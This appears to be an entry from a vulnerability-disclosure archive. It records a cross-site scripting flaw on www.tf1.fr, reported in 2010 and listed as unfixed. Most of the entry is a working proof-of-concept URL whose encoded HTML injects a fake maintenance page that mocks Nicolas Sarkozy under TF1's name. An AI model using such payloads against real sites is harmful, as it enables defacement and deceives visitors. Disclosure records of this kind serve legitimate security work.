Security researcher warvector, has submitted on 27/08/2010 a cross-site-scripting (XSS) vulnerability affecting www.tf1.fr, which at the time of submission ranked 945 on the web according to Alexa. 
We manually validated and published a mirror of this vulnerability on 15/12/2011. It is currently unfixed. 
If you believe that this security issue has been corrected, please send us an e-mail. | 
 
              | Date submitted: 27/08/2010 | 
Date published: 15/12/2011 | 
Fixed? Mail us! | Status:   UNFIXED |  
 
| Author: warvector | 
Domain: www.tf1.fr | 
Category: XSS | 
Pagerank: 945 | 
 
 
 
URL: http://www.tf1.fr/--%3E%3Chtml%3E%3Chead%3E%3Ctitle%3ESite%20en%20maintenance%3C/title%3E%3C/head%3E %3Cbody%3E%3Ch1%3ELe%20site%20est%20actuellement%20en%20maintenance%20%C3%A0%20la%20demande%20de%20n otre%20bien%20aim%C3%A9%20pr%C3%A9sident%20-%20%3Cem%3ENicolas%20Sarkozy%3C/em%3E%20-%20qui%20d%C3%A 9sire%20pouvoir%20communiquer%20en%20direct%20via%20chat%20webcam%20avec%20les%20tapz%20de%20%3Cfont %20color=%22blue%22%3ESecret%20Story%3C/font%3E%3Cbr%20/%3ENous%20sommes%20donc%20en%20train%20d%27a dapter%20ce%20site%20pour%20nous%20plier%20%C3%A0%20sa%20demande,%20comme%20d%27habitude%20en%20somm e%3Cbr%20/%3E%3Cbr%20/%3EMerci%20de%20votre%20compr%C3%A9hension,%3Cbr%20/%3EL%27%C3%A9quipe%20de%20 TF1%3C/h1%3E%3C/body%3E%3Cnoframes%3E/ | 
 
| 
Click here to view the mirror
 | 
 
| 
 | 
 
 
         
 |